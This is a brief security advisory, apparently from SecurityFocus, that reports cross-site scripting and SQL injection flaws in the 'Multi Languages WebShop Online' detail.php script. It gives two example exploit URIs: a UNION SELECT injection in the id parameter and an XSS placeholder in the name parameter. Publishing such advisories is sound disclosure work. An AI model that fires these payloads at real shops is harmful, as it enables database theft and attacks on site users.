Multi Languages WebShop Online Cross-Site Scripting and SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--

http://www.example.com/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13


 

Privacy Statement
Copyright 2010, SecurityFocus